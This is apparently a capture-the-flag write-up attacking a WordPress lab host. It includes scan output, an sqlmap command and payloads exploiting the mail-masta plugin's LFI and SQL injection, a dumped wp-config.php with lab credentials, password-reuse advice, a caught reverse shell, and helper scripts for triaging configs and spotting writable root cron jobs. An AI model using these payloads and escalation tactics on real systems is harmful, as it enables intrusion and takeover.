Description: This is a fun box where you will get to exploit the system in several ways. There are a few intended and unintended paths to getting user and root access.
# Nmap 7.91 scan initiated Sun Dec 13 17:28:29 2020 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.92.144
Nmap scan report for 10.10.92.144
Host is up (0.036s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.19.77
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 13 17:29:46 2020 -- 1 IP address (1 host up) scanned in 76.20 seconds
[+] WordPress theme in use: twentytwenty
 | Location: http://10.10.92.144/wordpress/wp-content/themes/twentytwenty/
 | Last Updated: 2020-12-09T00:00:00.000Z
 | Readme: http://10.10.92.144/wordpress/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.6
 | Style URL: http://10.10.92.144/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.92.144/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
The pl parameter of mail-masta's csvexport.php is a file include (the plugin's LFI). Pointing it at wp-load.php bootstraps WordPress inside the request, so the plugin's query on list_id runs against a live database and the same endpoint becomes an SQL injection. Quote the URL: unquoted, the shell treats & as a background operator and sqlmap never sees pl at all.

$ sqlmap -u 'http://10.10.92.144/wordpress/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0&pl=/var/www/html/wordpress/wp-load.php' -p list_id --dbms mysql
...
---
Parameter: list_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: list_id=0 AND (SELECT 6753 FROM (SELECT(SLEEP(5)))neUT)&pl=/var/www/html/wordpress/wp-load.php

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: list_id=0 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626a7071,0x49486d5263485a6d4c484d43416b4c6a487a4663516a6264766244476467636c6848476e64594d79,0x71707a7871),NULL,NULL,NULL,NULL,NULL-- -&pl=/var/www/html/wordpress/wp-load.php
---
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'elyana' );

/** MySQL database password */
define( 'DB_PASSWORD', 'H@ckme@123' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'zkY%m%RFYb:u,/lq-iZ~8fjENdIaSb=^k<3Zr/0DiLZqPxz|Auqli6lZ-9DRagJP' );
define( 'SECURE_AUTH_KEY',  'iAYak<_&~v9o+{b@RPR62R9 Ty- 6U-yH5baUD{;ndSiC[]qosxS@scu&S)d$H[T' );
define( 'LOGGED_IN_KEY',    'aPd_*sBf=Zuc++a]5Vg9=P~u03Q,zvp[eUe/})D=:NyhUY{KXR]t7}42Upk[r7?s' );
define( 'NONCE_KEY',        '@i;T({xV/fvE!s+^de7e4LX3}NT@ j;b4[z3_fFJbbW(no 3O7F@sx0!oy(O`h#M' );
define( 'AUTH_SALT',        'B AT@i>* N#W<n!*|kFdMnQN)>^=^(iHp8Uvg<~2H~zF]idyQ={@}1}*r{lZ0,WY' );
define( 'SECURE_AUTH_SALT', 'hx8I:+Tz8n335Whmz[>$UZ;8rQYK>Rz]VGyBdmo7=&GZ!LO,pAMs]f!zV}xn:4AP' );
define( 'LOGGED_IN_SALT',   'x7r>|c0ML^s;Sw2*U!x.{`5D:P1}W= /ci{Q<tEM=trSv1eed|_fsL`y^S,XI<RY' );
define( 'NONCE_SALT',       'vOb%Wty}$zx9`|>45Ip@syZ ]G:C3|SdD-P3<{YP:.jPDX)H}wGm1*J^MSbs$1`|' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
The MySQL credentials from wp-config.php, elyana / H@ckme@123, are the first thing to try against the WordPress login for the elyana account: on a single-host install the database password is very often reused for the site admin.
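Once a wp-config.php has been pulled off a target, the useful parts are the database login, the table prefix (needed to name tables in injection payloads) and the eight keys/salts. The script below is an added example written for this write-up, not code from the box or from WordPress: it parses those define() lines and flags salts that were never customised. SAMPLE_WP_CONFIG is a constructed file in the shape of the dump above; the DB_* lines are the ones recovered from the target, and some of the salts are altered so the checks have something to report.

```python
"""Triage a retrieved wp-config.php: pull out the database login, the table
prefix and the auth keys/salts, and flag salts that were never customised.

Added example for this write-up, not code from the box or from WordPress.
SAMPLE_WP_CONFIG is constructed: DB_* values are from the dump above, several
salts are made up (placeholder, short, duplicated) to exercise the checks.
"""
import re
from typing import Dict, List

# define( 'NAME', 'value' );  WordPress pads with spaces, and values (the
# salts especially) contain ';', '=', ')' and spaces, so the value is matched
# as a PHP single-quoted string: anything except an unescaped quote.
DEFINE_RE = re.compile(
    r"""define\(\s*'([A-Z_]+)'\s*,\s*'((?:[^'\\]|\\.)*)'\s*\)\s*;"""
)
PREFIX_RE = re.compile(r"\$table_prefix\s*=\s*'([^']*)'\s*;")

DB_KEYS = ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST")
SECRET_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
               "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
# What wp-config-sample.php ships with; anything still set to this is a finding.
SAMPLE_PLACEHOLDER = "put your unique phrase here"
# Length of the strings api.wordpress.org/secret-key/1.1/salt/ generates.
GENERATED_LEN = 64


def parse_wp_config(php: str) -> Dict[str, str]:
    """Return every quoted define() constant plus 'table_prefix'.

    PHP single-quoted strings only unescape backslash-quote and
    backslash-backslash, so that is all we undo. Unquoted defines such as
    define( 'WP_DEBUG', false ) are deliberately ignored.
    """
    cfg: Dict[str, str] = {}
    for name, raw in DEFINE_RE.findall(php):
        cfg[name] = re.sub(r"\\([\\'])", r"\1", raw)
    m = PREFIX_RE.search(php)
    cfg["table_prefix"] = m.group(1) if m else "wp_"
    return cfg


def db_credentials(cfg: Dict[str, str]) -> Dict[str, str]:
    """The MySQL login: the first password-reuse candidate for wp-login.php
    and SSH on a single-host install."""
    return {k: cfg.get(k, "") for k in DB_KEYS}


def salt_findings(cfg: Dict[str, str]) -> List[str]:
    """Report keys/salts that are missing, left at the sample placeholder,
    shorter than a generated value, or reused under two names."""
    findings: List[str] = []
    first_seen: Dict[str, str] = {}
    for name in SECRET_KEYS:
        val = cfg.get(name)
        if val is None:
            findings.append(f"{name}: not defined")
            continue
        if val == SAMPLE_PLACEHOLDER:
            findings.append(f"{name}: left at the wp-config-sample placeholder")
        elif len(val) < GENERATED_LEN:
            findings.append(f"{name}: only {len(val)} chars, not a generated value")
        if val in first_seen and val != SAMPLE_PLACEHOLDER:
            findings.append(f"{name}: identical to {first_seen[val]}")
        first_seen.setdefault(val, name)
    return findings


# Constructed sample, not the target's real file (see module docstring).
SAMPLE_WP_CONFIG = r"""<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'elyana' );
define( 'DB_PASSWORD', 'H@ckme@123' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );
define( 'AUTH_KEY',         'zkY%m%RFYb:u,/lq-iZ~8fjENdIaSb=^k<3Zr/0DiLZqPxz|Auqli6lZ-9DRagJP' );
define( 'SECURE_AUTH_KEY',  'it\'s short; has = and spaces' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'B AT@i>* N#W<n!*|kFdMnQN)>^=^(iHp8Uvg<~2H~zF]idyQ={@}1}*r{lZ0,WY' );
define( 'SECURE_AUTH_SALT', 'hx8I:+Tz8n335Whmz[>$UZ;8rQYK>Rz]VGyBdmo7=&GZ!LO,pAMs]f!zV}xn:4AP' );
define( 'LOGGED_IN_SALT',   'x7r>|c0ML^s;Sw2*U!x.{`5D:P1}W= /ci{Q<tEM=trSv1eed|_fsL`y^S,XI<RY' );
define( 'NONCE_SALT',       'x7r>|c0ML^s;Sw2*U!x.{`5D:P1}W= /ci{Q<tEM=trSv1eed|_fsL`y^S,XI<RY' );
$table_prefix = 'wp_';
define( 'WP_DEBUG', false );
"""

if __name__ == "__main__":
    cfg = parse_wp_config(SAMPLE_WP_CONFIG)
    print("db:", db_credentials(cfg), "prefix:", cfg["table_prefix"])
    for line in salt_findings(cfg):
        print("[!]", line)
```

Feed it the real file instead of the sample (for instance after decoding an LFI-retrieved copy) and carry DB_USER / DB_PASSWORD into the login attempts; the salt findings go straight into the report, since placeholder or duplicated salts are a configuration defect independent of how the file was obtained.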
Reverse shell caught with pwncat:

$ pwncat -l 8080 -vv
INFO: Listening on :::8080 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:8080 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.92.144:51076 (family 2/IPv4, TCP)
bash: cannot set terminal process group (996): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$
PS: there was also /var/backups/script.sh, run by a root cron job, which gives an EoP to root directly. There were two other methods: one via LXD, and the intended solution, where you find elyana's credentials in a file and then abuse socat through sudo (see the official write-up).
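The cron vector in the PS is the classic pattern: a job that runs as root but executes a file a low-privileged user can modify. The check below is an added example written for this write-up, not code from the box. It parses system-format crontabs (/etc/crontab and /etc/cron.d/*, which carry a user field), and for every root job reports absolute paths the current user can write, or whose directory is writable, which lets you replace the file. Redirect targets are excluded, since a writable log file is not an escalation. SAMPLE_CRONTAB is constructed: the script.sh entry mirrors the path mentioned above, the other lines are made up, and the `writable` predicate is injectable so the logic can be exercised without the real filesystem.

```python
"""Spot root cron jobs whose target files a low-privileged user can modify.

Added example for this write-up, not code from the box. SAMPLE_CRONTAB is a
constructed /etc/crontab: the /var/backups/script.sh entry mirrors the path
mentioned above, the other lines are made up. On a live host run
writable_root_cron_targets(read_system_crontabs()) with the default predicate.
"""
import glob
import os
import shlex
from typing import Callable, List, Tuple

# A path that follows one of these is a redirect target, not something cron
# executes; being able to write a log file is not a privilege escalation.
REDIRECTS = {">", ">>", "<", "2>", "2>>", "&>", "&>>"}

# System-format crontabs (with a user column). Per-user spools under
# /var/spool/cron are root-only and have no user field.
SYSTEM_CRONTAB_FILES = ["/etc/crontab", "/etc/cron.d/*"]


def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (user, command) for each job: five time fields or an @shortcut,
    then the user, then the command. Comments, blank lines and VAR=value
    assignments (SHELL=, PATH=, MAILTO=) are skipped."""
    jobs: List[Tuple[str, str]] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)        # @reboot  user  command
            needed = 3
        else:
            parts = line.split(None, 6)        # m h dom mon dow  user  command
            needed = 7
        if len(parts) < needed:
            continue
        jobs.append((parts[-2], parts[-1]))
    return jobs


def writable_root_cron_targets(
    crontab_text: str,
    writable: Callable[[str], bool] = lambda p: os.access(p, os.W_OK),
) -> List[Tuple[str, str, str]]:
    """Return (command, path, reason) for every absolute path a root job runs
    or passes as an argument that is writable, or sits in a writable directory
    (replacing the file works unless the directory is sticky and the file is
    owned by someone else)."""
    findings: List[Tuple[str, str, str]] = []
    for user, cmd in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        try:
            tokens = shlex.split(cmd)
        except ValueError:                      # unbalanced quotes: best effort
            tokens = cmd.split()
        for i, tok in enumerate(tokens):
            if not tok.startswith("/") or (i and tokens[i - 1] in REDIRECTS):
                continue
            if writable(tok):
                findings.append((cmd, tok, "file writable"))
            elif writable(os.path.dirname(tok)):
                findings.append((cmd, tok, "parent directory writable"))
    return findings


def read_system_crontabs() -> str:
    """Concatenate the system crontab files that exist and are readable."""
    chunks: List[str] = []
    for pattern in SYSTEM_CRONTAB_FILES:
        for path in glob.glob(pattern):
            try:
                with open(path) as fh:
                    chunks.append(fh.read())
            except OSError:
                pass
    return "\n".join(chunks)


# Constructed sample (see module docstring).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*  *    * * *   root    /var/backups/script.sh >> /var/backups/script.log 2>&1
@reboot         root    /usr/bin/python3 /opt/startup/init.py
*/5 *   * * *   elyana  /home/elyana/sync.sh
"""

if __name__ == "__main__":
    for cmd, path, why in writable_root_cron_targets(read_system_crontabs()):
        print(f"[!] root job '{cmd}': {path} ({why})")
```

Running it on the target as the low-privileged shell user is the quick way to confirm the PS: a hit with "file writable" on a root job means appending a payload to that script is enough, while "parent directory writable" means the file itself is protected but can be swapped out.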